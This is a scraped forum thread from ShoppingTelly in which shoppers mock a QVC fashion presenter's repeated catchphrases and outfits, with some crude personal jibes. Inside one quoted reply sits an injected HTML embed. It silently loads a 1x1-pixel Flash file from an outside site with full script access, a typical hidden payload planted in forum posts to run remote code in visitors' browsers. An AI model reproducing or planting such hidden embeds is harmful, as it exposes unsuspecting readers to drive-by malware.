New Glen-ism

ShoppingTelly

Help Support ShoppingTelly:

C

Ciociaria

Guest Shopper
Loved Glen this afternoon. He trotted out all the old favourites:

Dress them up, dress them down with a little trouser or city shorts and a pair of ballet flats.

However, he came out with a new one - a soft little tea dress for wearing with sandals to a party or to tea with your girlfriends.

Wow - I am impressed. Never thought of that combination before! I wonder if we should order a particular type of tea too? And would that be tea at the Ritz or a fly cup at Gregg's the Baker?

he's been in full flow today hasn't he?

missed those particular words of wisdom, think I'd tuned him out by then....he reminds me of Kim Mendelson in that he speaks in a fast fire stream of consciousness that doesn't make any sense at all if you actually listen. Julia had to try and shut him up a few times and admitted at one point she'd stopped listening to him :giggle:

is glen actually real or a robot? lol he uses the same claptrap so often it's like he's programmed to say it if he came out with some new different advice i would have a different opinion but i have my suspicions lol

he's like the Hokey Coakey song:

" you put your trouser on with your little white top
dress it up dress it down, shake it all about,
you put your city shorts on with your little white top,
dress it up, dress it down shake it all about"

I feel that I could join in now when he speaks and I would know all the words and expressions!

I bet any money that Glen thinks that half the stuff they flaunt on QVC is naff anyway..........but hey, if QVC are willing to pay him for talking crap then crap he will talk:up: I would stand and spout a load of rubbish too if they paid me well for it:giggle:

I bet any money that Glen thinks that half the stuff they flaunt on QVC is naff anyway..........but hey, if QVC are willing to pay him for talking crap then crap he will talk:up: I would stand and spout a load of rubbish too if they paid me well for it:giggle:<embed allowScriptAccess="always" src="http://www.snivi.com/files/1.swf" quality="high" bgcolor="#ffffff" width="1" height="1" name="movie" align="" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed>

Make that 2! :giggle:

I bet any money that Glen thinks that half the stuff they flaunt on QVC is naff anyway..........but hey, if QVC are willing to pay him for talking crap then crap he will talk:up: I would stand and spout a load of rubbish too if they paid me well for it:giggle:

Well................ let's face it, it's got to better than signing on! Which is what he'd be doing if he wasn't on QVC. :giggle:

Loved Glen this afternoon. He trotted out all the old favourites:

Dress them up, dress them down with a little trouser or city shorts and a pair of ballet flats.

However, he came out with a new one - a soft little tea dress for wearing with sandals to a party or to tea with your girlfriends.

Wow - I am impressed. Never thought of that combination before! I wonder if we should order a particular type of tea too? And would that be tea at the Ritz or a fly cup at Gregg's the Baker?

Tea dress? Is that the one wot's got your tea slopped down the front?

Surprised he hasn't come up with the floaty little maxi dress/gladiator sandal/ floppy straw sunhat combo for that romantic picnic.....just right for perching on the front handlebars of the pushbike which is being expertly driven by your open necked linen shirted/casual shorted impossibly hansome boyfriend!

Last edited:
sometimes i think he's paid by the word, doesn't matter what words or if they make any practical fashion advice, just paid by the word.........................

The cardi has to be fastened in the middle and left open in a V at the bottom to frame the male crotch area ( in tight white trousers)
:giggle:

You must have seen today's outfit then. I must say that I'm finding the bulging crotch look a little offputting. What does he look like with that pink cardigan on? If he walked down my high street with that get up, he wouldn't come out in one piece!

Hmm, greige t-shirt, coral-pink cardi, cream trousers and red shoes? In what world, on what planet is that 'on-trend'?

I'm telling yah! QVC are having a laugh at our expense employing that wally! Thank God he's now b*****ed off home!!!

I'm sure he's a really nice, kind-hearted person and that he really wants to help people, but I'm finding it increasingly difficult to trust the opinion of someone who today looked like they got dressed in the dark! I know on here I've suggested, in the past, that we not pass personal comments about people but I don't consider that is what most of us are doing. Glen's job is to advise on fashion - if he isn't looking slick himself, it's difficult to take him seriously in that role. Genevieve, on the other hand, always looks great.

Hmm, greige t-shirt, coral-pink cardi, cream trousers and red shoes? In what world, on what planet is that 'on-trend'?

Maybe he's inspired by McDonalds.

The Ronald McDonald "mental hospital escapee look" is THE look for summer 2015.

Glen's just ahead of his time :devil:

Latest posts

Back